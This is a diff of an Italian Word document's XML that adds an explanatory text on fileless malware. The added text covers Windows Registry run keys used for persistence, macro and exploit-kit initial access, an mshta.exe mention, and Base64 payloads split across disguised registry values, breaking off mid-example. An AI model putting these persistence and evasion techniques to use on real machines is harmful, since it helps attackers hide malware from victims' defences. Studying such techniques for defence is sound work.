-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">el registro </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">per portare a compimento i </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>loro</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> scop</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>i</w:t>
+        <w:t xml:space="preserve">(come </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ad esempio)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -156,7 +198,137 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Le HKEY non hanno tutte lo stesso scopo</w:t>
+        <w:t xml:space="preserve">Questa evoluzione nasce dall'esigenza degli attaccanti di eludere le soluzioni di sicurezza convenzionali, quali gli antivirus basati su firma, che focalizzano la loro attività di scansione principalmente sul file system. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tuttavia,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per un </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>fileless malware</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> operare esclusivamente in RAM presenta un limite critico: la volatilità. Se risiedesse solo nella memoria volatile, la minaccia verrebbe eliminata a ogni semplice riavvio del computer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Per garantire la propria sopravvivenza, il malware fileless deve dunque stabilire un meccanismo di </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>persistenza</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. È in questa fase che il Registro di Sistema di Windows viene trasformato da database di configurazione a vero e proprio supporto </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>di</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> storage per il </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>virus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Il vettore di attacco: dall'esecuzione iniziale alla scrittura nel Registro</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Prima di potersi stabilire nel Registro di Sistema, il malware deve ottenere l'accesso iniziale al computer vittima. Questo avviene solitamente attraverso tecniche che non prevedono il salvataggio di un eseguibile tradizionale sul disco</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -164,6 +336,393 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:t>, ad esempio</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Phishing e </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ocumenti </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">acro: L'utente riceve un file (es. Word o Excel) che, una volta aperto, esegue una macro. Questa macro non scarica un virus, ma lancia direttamente un comando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> che scrive le chiavi malevole nel registro.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Exploit Kit e Vulnerabilità Browser: Navigando su un sito compromesso, una vulnerabilità del browser può permettere l'esecuzione di codice JavaScript che interagisce con il sistema, inserendo il payload direttamente nel registro.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Una volta che queste istruzioni sono state scritte nel Registro, il malware ha completato la fase di installazione fileless: da quel momento in poi, il "corpo" del virus risiederà solo nel database del Registro e la sua attività sarà visibile solo in memoria RAM.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>I fileless malware e i registri di sistema</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>, meccanismi di persistenza</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>È bene chiarire a grandi linee cosa è il</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Registro di Sistema di Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>: U</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n database gerarchico che memorizza le impostazioni di configurazione</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> del sistema operativo e dei programmi installati</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nell fattispecie, u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>fileless m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>lware</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>uò</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sfruttare </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">opportunamente una o più </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>chiavi d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">el registro </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">per </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>garantire la sua persistenza</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> o la memorizzazione di codice</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Le HKEY</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Handle to a Key)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> non hanno tutte lo stesso scopo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>ad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> esempio</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -180,8 +739,8 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="7029"/>
-        <w:gridCol w:w="2599"/>
+        <w:gridCol w:w="6992"/>
+        <w:gridCol w:w="2636"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -352,6 +911,13 @@
               </w:rPr>
               <w:t>Persistenza globale per tutti gli utenti</w:t>
             </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> al logon</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -436,6 +1002,13 @@
                 <w:szCs w:val="26"/>
               </w:rPr>
               <w:t>Esecuzione di codice durante la fase iniziale del logon</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> per tutti gli utenti</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -691,62 +1264,29 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">I malware fileless, sfruttando opportunamente le chiavi di registro di </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sistema </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> scrivendo all’interno comandi “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>legittmi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">”, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>possono creare danni al computer infetto.</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1 - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Comandi</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -754,7 +1294,6 @@
         <w:rPr>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
-          <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1329,7 +1868,7 @@
         </w:rPr>
         <w:t xml:space="preserve">mshta.exe   </w:t>
       </w:r>
-      <w:hyperlink r:id="rId6" w:history="1">
+      <w:hyperlink r:id="rId8" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Collegamentoipertestuale"/>
@@ -1495,24 +2034,550 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2 - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Codice Malevolo</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Questa tecnica di "Payload </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Storing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>" si articola solitamente in due fasi:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Frammentazione e Offuscamento: Il codice malevolo (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ad esempio</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) viene codificato in formato </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Base64</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e spesso frammentato in più valori di registro per eludere i limiti di dimensione delle singole chiavi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mimetismo nei Dati: Il payload viene salvato all'interno di chiavi dai nomi apparentemente legittimi o in aree del registro poco monitorate (ad esempio sotto HKCU\Software\Classes\ o in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>sottochiavi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di telemetria).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Il registro agisce quindi come una memoria statica e persistente dove il virus risiede in forma di stringa testuale. Al momento dell'esecuzione, un comando minimo (il </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>trigger</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>) preleva questa stringa, la ricompone e la inietta direttamente nella memoria RAM del sistema. Questo approccio rende il malware invisibile a una tradizionale analisi del file system, poiché l'intera logica dell'attacco esiste solo all'interno del database del registro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di sistema.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Esempio di esecuzione tramite frammentazione:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>In</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>HKCU\Software\Microsoft\Windows\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>CurrentVersion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Telemetry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viene salvato il valore ID contenente la prima metà del payload in Base64</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
